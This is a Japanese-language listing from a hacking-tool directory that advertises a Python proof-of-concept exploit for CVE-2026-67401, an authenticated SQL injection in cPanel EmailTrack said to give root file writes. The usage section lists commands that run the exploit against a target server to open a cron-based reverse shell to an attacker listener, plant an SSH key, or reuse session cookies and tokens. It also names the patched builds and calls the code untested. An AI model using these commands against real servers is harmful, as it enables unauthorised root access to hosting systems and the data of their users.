Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-67401 — Python製のCVE-2026-67401の概念実証コード。cPanel EmailTrackにおける認証済みSQLインジェクションで、SQLiteのATTACH DATABASEを介してroot権限で任意のファイル書き込みを可能にし、リバースシェルやSSHキーの設置を実現します。 | Kitploit
ツール/GitHubGitHub/axedos/cve-2026-67401
特権昇格エクスプロイトウェブアプリケーション悪用ペネトレーションテストペイロード開発
GitHubaxedos/cve-2026-67401

CVE-2026-67401

Python製のCVE-2026-67401の概念実証コード。cPanel EmailTrackにおける認証済みSQLインジェクションで、SQLiteのATTACH DATABASEを介してroot権限で任意のファイル書き込みを可能にし、リバースシェルやSSHキーの設置を実現します。

リポジトリを見る
19時間1分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-67401

cPanel EmailTrack における SQL インジェクション。メール権限を持つ認証済み cPanel ユーザーが、SQLite の ATTACH DATABASE を介して root として任意のファイルを書き込めます。root 到達までに必要なリクエストは 1 回です。実環境でのテストは未実施で、コードは公開情報と基本的な差分解析のみから組み立てられています。研究者として十分な調査を行い、試した上で PR による修正を送ってください。

2026年9月8日のパッチ以前のすべての cPanel/WHM ビルドに影響します。

必要なもの

  • 対象サーバー上でメール権限を持つ有効な cPanel アカウント
  • Python 3、requests ライブラリ
  • リバースシェルペイロードを使用する場合のリスナー

使用方法

root@kitploit:~
# cron 経由のリバースシェル
python3 poc.py --target https://host:2083 -u user -p pass --lhost 10.0.0.1 --lport 443

# SSH キーの設置
python3 poc.py --target https://host:2083 -u user -p pass --ssh-key ~/.ssh/id_rsa.pub

# 既存セッション
python3 poc.py --target https://host:2083 --cookie abc --token cpsessXXX --lhost 10.0.0.1

# ドライラン(リクエストを表示のみ、送信しない)
python3 poc.py --target https://host:2083 --dry-run --lhost 10.0.0.1

修正版

  • 11.138.0.4 (CURRENT/EDGE)
  • 11.136.0.39 (RELEASE/STABLE)
  • 11.134.0.55 (LTS)
ツールをダウンロード